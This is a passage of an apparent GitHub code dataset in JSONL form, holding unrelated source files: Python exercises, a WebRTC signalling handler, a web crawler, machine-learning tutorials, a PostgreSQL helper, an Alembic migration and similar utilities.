'>' + values)\n# counter +=1\n\n\n\n\nmovies = {\n 'Die Hard':'USA',\n 'Lord of the rings':'New Zealand',\n 'Terminator':'Australia',\n 'Batman': 'New York',\n 'Superman':'Washington'\n}\n\nprint(movies['Die Hard'])\ncounter=1\nfor movie_key in movies:\n print('This is the movie:', counter, movie_key, movies[movie_key])\n counter +=1\n\n\n#Don't know how to number\n\n\n\n\n# Create a game that runs until a magic number is found(while+if+break)\n# guess=int(input('Enter a number'))\n\n# while (guess==7):\n# print('You found the magic number')\n# if guess>7:\n# print('Number is too big')\n# if guess<7:\n# print('Number is too small')\n# else:\n# ('Type in a number')\n#\n# #Check if number is prime\n# # number = int(input(\"Enter any number: \"))\n#\n# # prime number is always greater than 1\n# if number > 1:\n# for i in range(2, number):\n# if (number % i) == 0:\n# print(number, \"is not a prime number\")\n# break\n# else:\n# print(number, \"is a prime number\")\n#\n# # if the entered number is less than or equal to 1\n# # then it is not prime number\n# else:\n# print(number, \"is not a prime number\")\n\n\n#Program to count the number of individual characters in a string\n#\n# count=input(\"Enter a string\")\n# print(len(count))\n","repo_name":"Mguysin/Python_files","sub_path":"Week 2/w2d3 Tasks (Loops).py","file_name":"w2d3 Tasks (Loops).py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"30502829178","text":"# -*- coding: utf-8 -*-\n# vim:set et tabstop=4 shiftwidth=4 nu nowrap fileencoding=utf-8:\n\nimport rtc\nimport sdp\nimport logging as log\n\nfrom tornado.websocket import WebSocketHandler\n\n\n__all__ = ['SignallingChannelHandler']\n\n\nSTATE_UNKNOWN = 0x00\nSTATE_START = 0x01\nSTATE_SDP_DESCR = 0x02\nSTATE_SDP_CANDIDATE = 0x03\nSTATE_DONE = 0x04\nSTATE_ERROR = 0xfe\nSTATE_CLOSED = 0xff\n\n\nclass SignallingChannelHandler(WebSocketHandler):\n \"\"\"\n UDP dynamic port range: 49152-65535\n \"\"\"\n \n state = STATE_START\n \n remote_sdescr = None\n \n local_sdescr = None\n \n def open(self):\n self.state = STATE_SDP_DESCR\n log.info('Signalling channle was opened.')\n \n def on_message(self, message):\n log.info('Message has been received on signalling channel:\\r\\n{0}.'.format(message))\n if self.state == STATE_SDP_DESCR :\n self.on_session_description(message)\n elif self.state == STATE_SDP_CANDIDATE :\n self.on_candidate(message)\n else :\n log.warn('Unsupported state {0}. Signalling message will be ignored.'.format(self.state))\n \n def on_session_description(self, msg):\n \"\"\"\n Method determines which media available streams and\n sends session description back to web-application.\n \n @type msg: C{str}\n @param msg: Session description. it should be utf-8 encoded string\n \"\"\"\n self.state = STATE_SDP_CANDIDATE\n self.remote_sdescr = rtc.SessionDescription(rtc.SdpType.offer, unicode(msg))\n self.local_sdescr = rtc.SessionDescription(rtc.SdpType.answer, self.remote_sdescr.sdp)\n self.write_message(self.local_sdescr.to_json().encode('utf-8'))\n \n def on_candidate(self, msg) :\n \"\"\"\n This method selects most approprivate candidate.\n\n @type msg: C{str}\n @param msg: SDP candidate, utf-8 encoded string\n \"\"\"\n self.state = STATE_SDP_CANDIDATE\n ice_candidate = rtc.IceCandidate.create_from_string(unicode(msg))\n log.info('ice_candidate: {0}'.format(ice_candidate))\n self.write_message(msg)\n \n def on_close(self):\n log.info('Signalling channel has been closed.')\n\n","repo_name":"zolkko/ubot","sub_path":"roboserv/roboserv/signallingchannel.py","file_name":"signallingchannel.py","file_ext":"py","file_size_in_byte":2204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"38035488233","text":"import re\r\nfrom bs4 import BeautifulSoup\r\nfrom requests import get\r\nimport pandas as pd\r\nimport os\r\n\r\n\r\nclass Scrapper:\r\n\r\n def __init__(self, url, file_format, output, urls_dictionary):\r\n # self.url = url\r\n self.url = url[:-1] if url[-1] == '/' else url\r\n self.file_format = file_format\r\n self.output = output\r\n self.urls_dictionary = urls_dictionary\r\n\r\n def start_crawl(self):\r\n try:\r\n page = get(self.url)\r\n except Exception:\r\n self.update_main_link('error', 'error', 'error')\r\n return self.urls_dictionary\r\n bs = BeautifulSoup(page.content, 'html.parser')\r\n if bs.find(\"title\") is not None:\r\n page_title = bs.find(\"title\").get_text()\r\n else:\r\n page_title = ''\r\n external_links_counter = 0\r\n internal_links_counter = 0\r\n external_links_condition = \"^http.*\"\r\n for link in self.get_uniqe_links(bs):\r\n if re.match(external_links_condition, link):\r\n external_links_counter += 1\r\n else:\r\n internal_links_counter += 1\r\n self.update_reference_counter(self.url + link)\r\n self.update_main_link(external_links_counter, internal_links_counter, page_title)\r\n return self.urls_dictionary\r\n\r\n def update_main_link(self, external_links_counter, internal_links_counter, page_title):\r\n main_url = self.url + \"/\" if (self.url + \"/\") in self.urls_dictionary.keys() else self.url\r\n ref_counter = 0 if main_url not in self.urls_dictionary.keys() else self.urls_dictionary[main_url][\r\n 'reference count']\r\n self.urls_dictionary[main_url] = self.create_row(main_url, page_title, internal_links_counter,\r\n external_links_counter, ref_counter)\r\n\r\n def update_reference_counter(self, link):\r\n if link in self.urls_dictionary.keys():\r\n self.urls_dictionary[link]['reference count'] += 1\r\n else:\r\n self.urls_dictionary[link] = self.create_row(link, '', -1, -1, 1)\r\n\r\n def read_file(self):\r\n if os.path.isfile(self.output):\r\n if self.file_format == 'CSV':\r\n return pd.read_csv(self.output)\r\n if self.file_format == 'JSON':\r\n return pd.read_json(self.output)\r\n else:\r\n return pd.DataFrame(\r\n columns=['url', 'title', 'internal links count', 'external links count', 'reference count'],\r\n index=[0])\r\n\r\n def create_dictionary_from_dataframe(self, data_frame):\r\n dictionary = {}\r\n for index, row in data_frame.iterrows():\r\n dictionary[row['url']] = {'url': row['url'], 'title': row['title'],\r\n 'internal links count': row['internal links count'],\r\n 'external links count': row['external links count'],\r\n 'reference count': row['reference count']}\r\n return dictionary\r\n\r\n def create_row(self, link, page_title, internal_links_counter, external_links_counter, reference_count):\r\n d = {'url': link, 'title': page_title,\r\n 'internal links count': internal_links_counter,\r\n 'external links count': external_links_counter,\r\n 'reference count': reference_count}\r\n return d\r\n\r\n def get_uniqe_links(self, bs):\r\n\r\n unique_links = set()\r\n for link in bs.find_all('a'):\r\n link = link.get('href')\r\n if link is not None and len(link) > 1 and \"?\" not in link and '/..' not in link:\r\n link = link[:-1] if link[-1] == '/' and link[-2] != '/' else link\r\n unique_links.add(link)\r\n return unique_links\r\n","repo_name":"Krzystoss/Web_crawler","sub_path":"scrapper.py","file_name":"scrapper.py","file_ext":"py","file_size_in_byte":3809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"11282881398","text":"import pygame, sys\nfrom pygame.locals import *\nfrom game.imageimporter import importimage as load\n\nclass Player(pygame.sprite.Sprite):\n def __init__(self, pos_x, pos_y):\n super().__init__()\n self.sprite = []\n self.sprite.append(load('assets/character/front.png'))\n self.sprite.append(load('assets/character/back.png'))\n self.sprite.append(load('assets/character/left.png'))\n self.sprite.append(load('assets/character/right.png'))\n self.current_sprite = 0\n self.image = self.sprite[self.current_sprite]\n\n self.pos_x = pos_x\n self.pos_y = pos_y\n self.rect = self.image.get_rect()\n self.rect.topleft = [pos_x, pos_y]\n\n def update_view(self, dr):\n self.current_sprite = dr\n self.image = self.sprite[self.current_sprite]\n\n def move_right(self, step):\n self.pos_x += step\n self.rect.topleft = [self.pos_x, self.pos_y]\n\n def move_left(self, step):\n self.pos_x -= step\n self.rect.topleft = [self.pos_x, self.pos_y]\n\n def move_up(self, step):\n self.pos_y -= step\n self.rect.topleft = [self.pos_x, self.pos_y]\n\n def move_down(self, step):\n self.pos_y += step\n self.rect.topleft = [self.pos_x, self.pos_y]","repo_name":"JonasBernard/game-off-2022","sub_path":"player/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"8101170920","text":"#importing the libaries\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\n#loading the dataset\r\ndataset = pd.read_csv('6. Decision Tree Classification\\Social_Network_Ads.csv')\r\nX = dataset.iloc[:,:-1].values\r\ny = dataset.iloc[:,-1].values\r\n\r\n#Spliting of the data into training and testing dataset\r\nfrom sklearn.model_selection import train_test_split\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25,random_state=4)\r\nprint(X_train)\r\nprint(X_test)\r\n\r\n#Feature Scaling\r\nfrom sklearn.preprocessing import StandardScaler\r\nsc = StandardScaler()\r\nX_train = sc.fit_transform(X_train)\r\nX_test = sc.transform(X_test)\r\nprint(X_train)\r\nprint(X_test)\r\n\r\n#Making Decision Tree Clasifier \r\nfrom sklearn.tree import DecisionTreeClassifier\r\nclf = DecisionTreeClassifier(criterion='entropy',random_state=1)\r\nclf.fit(X_train, y_train)\r\n\r\n#Predicting the new value\r\nprint(clf.predict(sc.transform([[30,87000]])))\r\n\r\n#Predicting the testing dataset\r\ny_pred = clf.predict(X_test)\r\n\r\n#Finding the accuracy\r\nfrom sklearn.metrics import confusion_matrix, accuracy_score\r\ncm = confusion_matrix(y_test, y_pred)\r\nprint(cm)\r\nacc = accuracy_score(y_test, y_pred)\r\nprint(acc)\r\n\r\n#Visualising the training set\r\nfrom matplotlib.colors import ListedColormap\r\nX_set, y_set = sc.inverse_transform(X_train), y_train\r\nX1, X2 = np.meshgrid(np.arange(start = X_set[:, 0].min() - 10, stop = X_set[:, 0].max() + 10, step = 0.25),\r\n np.arange(start = X_set[:, 1].min() - 1000, stop = X_set[:, 1].max() + 1000, step = 0.25))\r\nplt.contourf(X1, X2, clf.predict(sc.transform(np.array([X1.ravel(), X2.ravel()]).T)).reshape(X1.shape),\r\n alpha = 0.75, cmap = ListedColormap(('red', 'green')))\r\nplt.xlim(X1.min(), X1.max())\r\nplt.ylim(X2.min(), X2.max())\r\nfor i, j in enumerate(np.unique(y_set)):\r\n plt.scatter(X_set[y_set == j, 0], X_set[y_set == j, 1], c = ListedColormap(('red', 'green'))(i), label = j)\r\nplt.title('Decision Tree Classification (Training set)')\r\nplt.xlabel('Age')\r\nplt.ylabel('Estimated Salary')\r\nplt.legend()\r\nplt.show()\r\n\r\n#Visualising the testing set\r\nfrom matplotlib.colors import ListedColormap\r\nX_set, y_set = sc.inverse_transform(X_test), y_test\r\nX1, X2 = np.meshgrid(np.arange(start = X_set[:, 0].min() - 10, stop = X_set[:, 0].max() + 10, step = 0.25),\r\n np.arange(start = X_set[:, 1].min() - 1000, stop = X_set[:, 1].max() + 1000, step = 0.25))\r\nplt.contourf(X1, X2, clf.predict(sc.transform(np.array([X1.ravel(), X2.ravel()]).T)).reshape(X1.shape),\r\n alpha = 0.75, cmap = ListedColormap(('red', 'green')))\r\nplt.xlim(X1.min(), X1.max())\r\nplt.ylim(X2.min(), X2.max())\r\nfor i, j in enumerate(np.unique(y_set)):\r\n plt.scatter(X_set[y_set == j, 0], X_set[y_set == j, 1], c = ListedColormap(('red', 'green'))(i), label = j)\r\nplt.title('Decision Tree Classification (Test set)')\r\nplt.xlabel('Age')\r\nplt.ylabel('Estimated Salary')\r\nplt.legend()\r\nplt.show()","repo_name":"Anish0494/Data-Science-and-Ml-algorithm-using-Python","sub_path":"Part__3__CLassification/6. Decision Tree Classification/DecisionTree.py","file_name":"DecisionTree.py","file_ext":"py","file_size_in_byte":2951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"35423229371","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport numpy\n\n\ndef get_close_points(tolerane: float, y0: numpy.ndarray, y1: numpy.ndarray, x: numpy.ndarray = None):\n idx = numpy.argwhere(numpy.abs(y0 - y1) < tolerane)\n\n if x is not None:\n return x[idx], y0[idx]\n\n return y0[idx]\n\n\ndef get_intersection_(y0: numpy.ndarray, y1: numpy.ndarray, x: numpy.ndarray = None):\n idx = numpy.argwhere(numpy.diff(numpy.sign(y0 - y1))).flatten()\n\n if x is not None:\n return x[idx], y0[idx]\n\n return y0[idx]\n\n\ndef get_intersection(y0: numpy.ndarray, y1: numpy.ndarray, x: numpy.ndarray, average: bool = True):\n\n idx = numpy.argwhere(numpy.diff(numpy.sign(y0 - y1))).flatten()\n\n if not average:\n return y0[idx]\n\n else:\n x_mean = (x[idx + 1] + x[idx]) / 2\n y_mean = (y0[idx + 1] + y0[idx]) / 2\n\n return x_mean, y_mean\n\n\ndef test_valid_input(user_input, valid_inputs: list, variable_name: str = ''):\n if user_input not in valid_inputs:\n raise ValueError(f\"[{variable_name}] user_input: {user_input} argument not valid. Valid choices are: {valid_inputs}\")\n\n\n# -\n","repo_name":"MartinPdeS/SuPyMode","sub_path":"SuPyMode/tools/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"76"} +{"seq_id":"32213413767","text":"from django.template import library\nfrom django.utils.safestring import mark_safe\n\nfrom ..menu import Menu\n\nregister = library.Library()\n\n\n@register.simple_tag(takes_context=True)\ndef paper_menu(context):\n request = context.get(\"request\")\n menu = Menu(request)\n menu.build_tree()\n menu.resolve_tree(request)\n menu.activate_tree(request)\n return mark_safe(menu.render(request))\n\n\n@register.simple_tag(takes_context=True)\ndef paper_menu_item(context, item):\n request = context.get(\"request\")\n return mark_safe(item.render(request))\n","repo_name":"dldevinc/paper-admin","sub_path":"paper_admin/templatetags/paper_menu.py","file_name":"paper_menu.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"76"} +{"seq_id":"9450410359","text":"'''\nDifficulty: Medium\n\nGiven a range [m, n] where 0 <= m <= n <= 2147483647, return the bitwise AND of all numbers in this range, inclusive.\n\nExample 1:\n\nInput: [5,7]\nOutput: 4\n\nExample 2:\n\nInput: [0,1]\nOutput: 0\n'''\nimport math\nimport time\n\n\nclass Solution:\n def rangeBitwiseAnd(self, m: int, n: int) -> int:\n # This one should be closer to O(n/2**n) on average, but O(n) worst case\n if not m or not n or m == 0:\n return 0\n mexp = int(math.log(m, 2))\n nexp = int(math.log(n, 2))\n if mexp != nexp:\n return 0\n else:\n returnval = m\n for x in range(returnval, n + 1):\n returnval &= x\n return returnval\n\n def rangeBitwiseAnds(self, m: int, n: int) -> int:\n # Premium solution, hella efficient, I think O(log n)\n while m < n:\n print(n)\n n = n & (n - 1)\n return m & n\n\n def rangeBitwiseAndn(self, m: int, n: int) -> int:\n # Naive O(n) solution\n returnval = m\n if m != 0:\n for x in range(m, n + 1):\n returnval &= x\n return returnval\n\n\nm = int(math.pow(2, 30))\nn = 2147483647\nstart = time.time()\n#print(Solution.rangeBitwiseAnd(\"\", m, n))\nprint(time.time() - start)\n\nstart = time.time()\nprint(Solution.rangeBitwiseAnds(\"\", m, n))\nprint(time.time() - start)\n\nstart = time.time()\n#print(Solution.rangeBitwiseAndn(\"\", m, n))\nprint(time.time() - start)\n","repo_name":"driscoll42/leetcode","sub_path":"0201-Bitwise_AND_of_Numbers_Range.py","file_name":"0201-Bitwise_AND_of_Numbers_Range.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"73942319285","text":"#python program to check a number is perfect number\na=int(input(\"Enter a number\"))\ns=0\nif True:\n if isinstance(a,int) and a>0:\n for i in range(1,a):\n if a%i==0:s+=i\n if s==a:\n print(\"Perfect Number\")\n else:\n print(\"Not perfect number\")\nelse: \n print(\"Numbers only accepted\")\n\n# In number theory, a perfect number is a positive integer that is equal to the sum of its positive divisors, excluding the number itself.","repo_name":"SarjakNEPAL/College","sub_path":"Semester 1/Programming and algorithms/Loop/PracticeQuestion/qno43.py","file_name":"qno43.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"27711467432","text":"# using keywords arguments improves readability\ntwitter_search('@obama', False, 20, True)\ntwitter_search('@obama', retweets=False, numtweets=20, popular=True)\n\n\n\n# printing tuple is better when using namedtuple()\n# because it gives you the keywords\ndoctest.testmod() \n# (0, 4)\ndoctest.testmod()\n# TestResults(failed=0, attempted=4)\nTestRestuls = namedtuple('TestResults', ['failed', 'attempted'])\n\n\n\n# this is what is done in other languages\np = 'Raymond', 'Hettinger', 0x30, 'python@example.com'\nfname = p[0]\nlname = p[1]\nage = p[2]\nemail = p[3]\n# in python, use unpacking\nfname, lname, age, email = p\n\n\n# update multiple state variables\n# in other languages we need to use temporary variables\ndef fibonacci(n):\n x = 0\n y = 1\n for i in range(n):\n print(x)\n t = y\n y = x + y\n x = t\n# in python this is better and faster\ndef fibonacci(n):\n x, y = 0, 1\n for i in range(n):\n print(x)\n x, y = y, x + y\n\n\n# simultaneous state updates\n# don't use tmp variables\ntmp_x = x + dx * t\ntmp_y = y + dy * t\ntmp_dx = influence(m, x, y, dx, dy, partial='x')\ntmp_dy = influence(m, x, y, dx, dy, partial='y')\nx = tmp_x\ny = tmp_y\ndx = tmp_dx\ndx = tmp_dy\n# use this\nx, y, dx, dy = (x + dx * t,\n y + dy * t,\n influence(m, x, y, dx, dy, partial='x'),\n influence(m, x, y, dx, dy, partial='y'))\n\n\n\n\n","repo_name":"brccabral/PythonTips","sub_path":"004_index_number_name.py","file_name":"004_index_number_name.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"22501698697","text":"import numpy as np\nimport pandas as pd\nimport warnings\n\nfrom scipy.stats import multivariate_normal as mvn\nfrom scipy.optimize import fsolve\nfrom typing import Tuple\n\nclass TypeIIIBiasSampler():\n def __init__(\n self,\n label_col: str,\n protected_attribute: str,\n recall_first_group: float,\n recall_second_group: float,\n fpr_first_group: float = 0.05,\n fpr_second_group: float = 0.05,\n protected_attribute_values: Tuple[str, str] = None,\n seed: int = 42,\n feature_names: Tuple[str, str] = (\"x1\", \"x2\"),\n ):\n self.label_col = label_col\n self.protected_attribute = protected_attribute\n self.recall_first_group = recall_first_group\n self.recall_second_group = recall_second_group\n self.fpr_first_group = fpr_first_group\n self.fpr_second_group = fpr_second_group\n self.pro_attr_values = protected_attribute_values\n self.seed = seed\n self.feature_names = feature_names\n self.mvn_neg, self.mvn_group_1, self.mvn_group_2 = (\n self._calculate_multivariate_normals()\n )\n\n def __call__(self, data: pd.DataFrame, inplace: bool = False) -> pd.DataFrame:\n if not inplace:\n data = data.copy()\n if not self.pro_attr_values:\n self.pro_attr_values = data[self.protected_attribute].unique()\n warnings.warn(\n f\"Protected attribute values order not passed. Using {self.pro_attr_values}.\",\n UserWarning,\n )\n\n # Add new columns to dataframe\n data[self.feature_names] = 1\n\n # Conditions for filtering dataframe.\n a_pos = ((data[self.protected_attribute] == self.pro_attr_values[0]) &\n (data[self.label_col] == 1))\n b_pos = ((data[self.protected_attribute] == self.pro_attr_values[1]) &\n (data[self.label_col] == 1))\n a_neg = ((data[self.protected_attribute] == self.pro_attr_values[0]) &\n (data[self.label_col] == 0))\n b_neg = ((data[self.protected_attribute] == self.pro_attr_values[1]) &\n (data[self.label_col] == 0))\n\n data.loc[a_pos, self.feature_names] = self.mvn_group_1.rvs(data[a_pos].shape[0])\n data.loc[b_pos, self.feature_names] = self.mvn_group_2.rvs(data[b_pos].shape[0])\n data.loc[a_neg, self.feature_names] = self.mvn_neg.rvs(data[a_neg].shape[0])\n data.loc[b_neg, self.feature_names] = self.mvn_neg.rvs(data[b_neg].shape[0])\n\n return data\n\n def _calculate_multivariate_normals(self) -> Tuple[mvn, mvn, mvn]:\n def get_mean(var: Tuple[float, float]) -> Tuple[float, float]:\n intercept, new_mean = var\n new_dist = mvn(mean=[new_mean, 0], cov=cov_matrix)\n\n obj_1 = 1 - mvn_negative.cdf([intercept, 0]) * 2 - fpr\n obj_2 = 1 - new_dist.cdf([intercept, 0]) * 2 - recall\n return obj_1, obj_2\n\n cov_matrix = [[1, 0], [0, 1]]\n mvn_negative = mvn(mean=[0, 0], cov=cov_matrix, seed=self.seed)\n\n fpr_list = [self.fpr_first_group, self.fpr_second_group]\n recall_list = [self.recall_first_group, self.recall_second_group]\n\n distributions = []\n for fpr, recall in zip(fpr_list, recall_list):\n estimate = [1.0, 1.0]\n _, mean = fsolve(get_mean, estimate)\n\n np.random.seed(self.seed)\n theta = 0.25 * np.pi\n rotation_matrix = np.array(\n [[np.cos(theta), -np.sin(theta)], [np.sin(theta), np.cos(theta)]]\n )\n mean = np.array([mean, 0])\n rotated_mean = np.matmul(rotation_matrix, mean)\n distributions.append(mvn(mean=rotated_mean, cov=cov_matrix, seed=self.seed))\n\n return mvn_negative, distributions[0], distributions[1]\n \n","repo_name":"feedzai/bank-account-fraud","sub_path":"notebooks/mvn.py","file_name":"mvn.py","file_ext":"py","file_size_in_byte":3826,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"76"} +{"seq_id":"32640760555","text":"from cv2 import imread, xfeatures2d\nfrom pickle import dump\nfrom os import mkdir, path\nimport numpy as np\nimport time\nfrom statistics import median\n\nn_test = '4'\npath_dataset = './Base/'\npath_pickles = './Tests/Test' + n_test +'/pickles/SURF/'\ndtt = np.load(path_dataset + 'Data_Treino_Teste_'+ n_test +'.npy', allow_pickle=True).item()\n\ndef pickle_dump(filename, data):\n with open(filename, 'wb') as pd:\n dump(data, pd)\n pd.close()\n\ndef vetor_create(surf, x):\n a = []\n if (x == 'mean'):\n for j in range(surf.descriptorSize()):\n a.append(des.transpose()[j].mean())\n if (x == 'median'):\n for j in range(surf.descriptorSize()):\n a.append(median(des.transpose()[j]))\n print('✔')\n return a\n\n\nhessianThresholds = [200]\n#hessianThresholds = [100, 200, 300]\n#nOctavs = [4, 10, 20, 22, 23, 24]\nnOctavs = [22]\nclasses = ['2', '5', '10', '20', '50', '100']\nstages = ['Treino', 'Teste']\ncalculos = ['mean', 'median']\nfor calc in calculos:\n for ht in hessianThresholds:\n for no in nOctavs:\n description = []\n surf = xfeatures2d.SURF_create(hessianThreshold = ht, nOctaves = no, nOctaveLayers = no - 1)\n description.append('Descriptor_Size:{0}'.format(surf.descriptorSize()))\n description.append('HessianThreshold:{0}'.format(surf.getHessianThreshold()))\n description.append('NOctaveLayers:{0}'.format(surf.getNOctaveLayers()))\n description.append('NOctaves:{0}'.format(surf.getNOctaves()))\n description.append(calc)\n print(\"\\n\".join(description))\n path_save = path_pickles + 'SURF' + \"_\".join(description)\n if not (path.isdir(path_save)):\n mkdir(path_save)\n t0 = time.time()\n for stage in stages:\n x = []\n y = []\n for classe in classes:\n for file_path in dtt[classe][stage]:\n print('Caminho', file_path)\n img = imread(file_path, 0)\n kp, des = surf.detectAndCompute(img, None)\n print(len(kp))\n print(len(des))\n a = vetor_create(surf, calc)\n x.append(a)\n y.append(int(classe))\n dados = np.array(x)\n rotulos = np.array(y)\n print('Dados ' + stage, dados)\n print('Rótulos ' + stage, rotulos)\n index = np.random.permutation(len(rotulos))\n X, Y = dados[index], rotulos[index]\n pickle_dump(path_save + '/Data_'+ stage +'.pickle', X)\n pickle_dump(path_save + '/Label_'+ stage +'.pickle', Y)\n t1 = time.time()\n file = open(path_pickles + 'Description.txt', 'a')\n file.write('\\nSURF\\n' +\"\\n\".join(description) + '\\n')\n file.write('Tempo Total: {0}\\n'.format(t1 - t0))\n file.close()\n else:\n print('Skip ❌ ' + path_save)","repo_name":"oziellcarvallho/Reconhecimento_Cedulas_Real","sub_path":"ExtractSurf.py","file_name":"ExtractSurf.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"3436463438","text":"\"\"\"\nDatabase Context Manager for PostgreSQL.\n\nrequires a config.yaml file.\nspecifying host, port user, password and dbname.\n\"\"\"\nimport yaml\nimport psycopg2\n\nclass Database(object):\n def __init__(self, config:str):\n super().__init__()\n # get host and port from config.yaml\n assert config.endswith('.yaml'), \"[DB] Configuration must be a yaml file.\"\n try:\n with open(config, 'r') as f:\n postgres = yaml.load(f, Loader=yaml.FullLoader)\n except FileNotFoundError as fe:\n print(\"[DB] Config file not found.\")\n except Exception as e:\n print(\"[DB] {}\".format(e))\n\n self.host = postgres['host']\n self.port = postgres['port']\n self.user = postgres['user']\n self.password = postgres['password']\n self.dbname = postgres['dbname']\n\n self.conn = None\n self.cursor = None\n \n # Context Manager magic methods\n def __enter__(self):\n \"\"\" Connects to database and return the cursor. \"\"\"\n self.conn = self._connect()\n self.cursor = self.conn.cursor()\n return self.cursor\n\n def __exit__(self, exc_type, exc_value, exc_traceback):\n \"\"\" Commit and closes connection to database. \"\"\"\n print(\"Committing to db...\")\n self.conn.commit()\n self.cursor.close()\n self.conn.close()\n\n def _connect(self):\n \"\"\" Connect to postgres DB with specified host and port\n \n Returns\n conn -- connection object\n \"\"\"\n try:\n conn = psycopg2.connect(dbname=self.dbname,\n user=self.user,\n password=self.password,\n host=self.host,\n port=self.port)\n return conn\n except psycopg2.OperationalError as e:\n print(e)\n\n\n\nif __name__ == \"__main__\":\n with Database('postgres/config.yaml') as cur: \n cur.execute(\"CREATE TABLE test (id serial PRIMARY KEY, num integer, data varchar);\")\n cur.execute(\"INSERT INTO test (num, data) VALUES (%s, %s);\", (100, \"abc'def\"))\n cur.execute(\"SELECT * FROM test;\")\n res = cur.fetchone()\n print(res)\n cur.execute(\"DROP TABLE test;\")","repo_name":"jackhhchan/fact-verification-system","sub_path":"src/postgres/_deprecated/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"41496181436","text":"import argparse\nimport logging\nimport sys\n\nlogging.basicConfig(level=logging.INFO)\n\nfrom .. import config, tables # noqa: E402\n\n\ndef main():\n parser = argparse.ArgumentParser(\n \"A tool for running the automation locally\"\n )\n parser.add_argument(\"action\", choices=[\"poll\"])\n parser.add_argument(\n \"--table\",\n type=lambda val: getattr(tables, val.upper()),\n required=True,\n help=\"Which Airtable table to use\",\n )\n parser.add_argument(\n \"--live\",\n type=bool,\n default=False,\n help=\"Enables updating airtable records\",\n )\n\n args = parser.parse_args()\n\n conf = config.load()\n client = args.table.get_airtable_client(\n conf.airtable, read_only=not args.live\n )\n\n succeeded = True\n if args.action == \"poll\":\n succeeded = client.poll_table(conf)\n else:\n raise ValueError(\"Unsupported action: {}\".format(args.action))\n\n print(\"Succeeded!\" if succeeded else \"Failed!\")\n sys.exit(0 if succeeded else 1)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"MerkleBros/automation_prime","sub_path":"automation/scripts/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"76"} +{"seq_id":"72839183926","text":"\"\"\"Inline parameters into ensembles\n\nRevision ID: 4effed76d1e2\nRevises: 98601344bcf5\nCreate Date: 2021-02-24 16:48:36.601870\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = \"4effed76d1e2\"\ndown_revision = \"98601344bcf5\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table(\"parameter\")\n op.add_column(\n \"ensemble\", sa.Column(\"parameters\", sa.ARRAY(sa.FLOAT()), nullable=False)\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column(\"ensemble\", \"parameters\")\n op.create_table(\n \"parameter\",\n sa.Column(\"id\", sa.INTEGER(), autoincrement=True, nullable=False),\n sa.Column(\n \"time_created\",\n postgresql.TIMESTAMP(),\n server_default=sa.text(\"now()\"),\n autoincrement=False,\n nullable=True,\n ),\n sa.Column(\n \"time_updated\",\n postgresql.TIMESTAMP(),\n server_default=sa.text(\"now()\"),\n autoincrement=False,\n nullable=True,\n ),\n sa.Column(\n \"values\",\n postgresql.ARRAY(postgresql.DOUBLE_PRECISION(precision=53)),\n autoincrement=False,\n nullable=False,\n ),\n sa.Column(\"ensemble_id\", sa.INTEGER(), autoincrement=False, nullable=False),\n sa.ForeignKeyConstraint(\n [\"ensemble_id\"], [\"ensemble.id\"], name=\"parameter_ensemble_id_fkey\"\n ),\n sa.PrimaryKeyConstraint(\"id\", name=\"parameter_pkey\"),\n )\n # ### end Alembic commands ###\n","repo_name":"equinor/ert-storage","sub_path":"src/ert_storage/_alembic/alembic/versions/4effed76d1e2_inline_parameters_into_ensembles.py","file_name":"4effed76d1e2_inline_parameters_into_ensembles.py","file_ext":"py","file_size_in_byte":1757,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"7640247489","text":"#!/usr/bin/python3\n\nimport sys\n\n\ndef errExit(msg, code):\n print(msg, file=sys.stderr)\n sys.exit(code)\n \n\nargs = sys.argv[1:]\n\nif len(args) == 0:\n errExit(1, \"ERR: No args\")\n \nif len(args) > 1:\n errExit(1, \"ERR: Too many args\")\n\n\nfilename = args[0]\n\n\nnums = [] #contains a string like '0x00ab' for every word in the binary\n\nwith open(filename, \"rb\") as f:\n while True:\n b = f.read(2)\n\n if len(b) == 0:\n break\n\n elif len(b) == 2:\n #parse them\n val = int.from_bytes(b, byteorder='little', signed=False)\n nums.append(\"0x{:04x}\".format(val))\n\n elif len(b) == 